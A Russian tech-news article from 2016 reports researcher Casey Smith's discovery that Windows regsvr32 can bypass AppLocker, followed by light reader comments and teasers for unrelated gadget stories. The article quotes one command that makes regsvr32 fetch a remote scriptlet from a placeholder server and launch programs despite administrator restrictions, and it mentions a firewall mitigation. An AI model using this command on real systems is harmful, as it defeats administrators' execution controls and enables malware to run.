• Новый велосипед из Нидерландов вообще не может упасть (4 фото + видео)

    Одна из главных транспортных проблем Нидерландов — это безопасность велосипедистов на дороге. Главная причина в этом кроется в частых падениях пожилых людей. Кажется, её удалось решить инженерам Делфтского техуниверситета и специалистам компании Koninklijke Gazelle.
    Читать дальше
  • Раскрыт секрет, помогавший древним вручную двигать многотонные камни (4 фото + видео)

    Тайна древних строителей, способных создать инженерные сооружения типа пирамиды Хеопса, Стоунхенджа или Саксайуамана не перестаёт волновать исследователей со всего мира. Инженеры из Массачусетского технологического института предположили, что древние архитекторы эффективно использовали системы рычагов и мастерски использовали баланс.
    Читать дальше
  • Названа причина поломки складных смартфонов Samsung Galaxy Fold (9 фото)

    Ранее проведённые журналистами тестирования выявили главный недостаток складывающихся смартфонов Samsung Galaxy Fold — быстрый отказ гибких экранов. Инженеры iFixit полностью разобрали смартфон и проанализировали конструкционные особенности устройства и степень пригодности его к ремонту. Попутно была выявлена наиболее вероятная причина пр...
    Читать дальше
  • Mafam M1: фитнес-браслет с беспроводными наушниками внутри (5 фото)

    В наши дни на рынке представлено столько разных беспроводных наушников и фитнес-браслетов, что удивить потребителя, кажется, уже невозможно. Но вот если их объединить, как например, в устройстве Mafam M1, – другое дело!
    Читать дальше
  • GPD Win Max – карманный ноутбук-приставка на процессоре Ryzen (4 фото)

    Фирма GPD специализируется на производстве портативных компактных компьютеров, и сейчас она работает над новинкой под названием Win Max. Ожидается, что устройство станет наследником мини-ноутбука GPD Win 2, выпущенного в прошлом году. Новая разработка может служить и портативной консолью, и ноутбуком.
    Читать дальше

Безопасность Windows оказалась под угрозой

27 апреля 2016 | Windows
Безопасность Windows оказалась под угрозой

В течение многих лет в бизнес-ориентированных версиях Windows присутствует функция AppLocker, которая позволяет администратору регулировать запуск тех или иных программ на компьютере. Например, можно запретить установку любых программ или запуск уже имеющихся приложений, которые не относятся к работе сотрудника. Это несомненно полезно для компаний, стремящихся защитить свою структуру от потенциально опасного ПО, однако исследователь Кейси Смит (Casey Smith) выяснил, что полностью доверять AppLocker не стоит, поскольку обнаруженная им уязвимость позволяет обходить ограничения администратора с помощью одной строки кода. Таким образом хакерам ничего не стоит взломать компьютеры и запустить вредоносное ПО.

Кейси Смит указал на инструмент Regsvr32, который можно использовать не по назначению для скачивания из интернета определенного XML-файла. Ввод команды вида regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll и скачивание файла, приведет к запуску cmd.exe, который можно заменить на любую другую программу, несмотря на установленные администратором ограничения в AppLocker. Атака не оставляет следов на жестком диске и в реестре, а в арсенале Microsoft пока не существует соответствующей «заплатки» для этой уязвимости. Описание ее Смит опубликовал на сервисе GitHub. Как вариант защиты рекомендуется отрезать Regsvr32 от интернета с помощью файервола.

Источник: engadget.com
Понравился пост? Просоединяйтесь к нам в Facebook!

Написать комментарий


Включите эту картинку для отображения кода безопасности
обновить, если не виден код


Комментарии: 5

avatar
27 апреля 2016 10:17 Hilo
Есть повод разработчикам заняться работой
+ 2
Ответить
avatar
27 апреля 2016 10:58 Гость_Xumepa
С админом можно и договориться об установке необходимого ПО
+ 0
Ответить
avatar
27 апреля 2016 11:30 Гость_M
В россии, за рубежом зарплата сисадминрстраторов достаточно высокая дабы не договорились
+ 0
Ответить
avatar
27 апреля 2016 12:08 WadymOS
Это что ж за админ такой, с которым можно договориться?
+ 0
Ответить
avatar
28 апреля 2016 11:41 zlodeu
Я например! )))
+ 3
Ответить
В Вашем браузере отключен JavaScript. Для корректной работы сайта настоятельно рекомендуется его включить.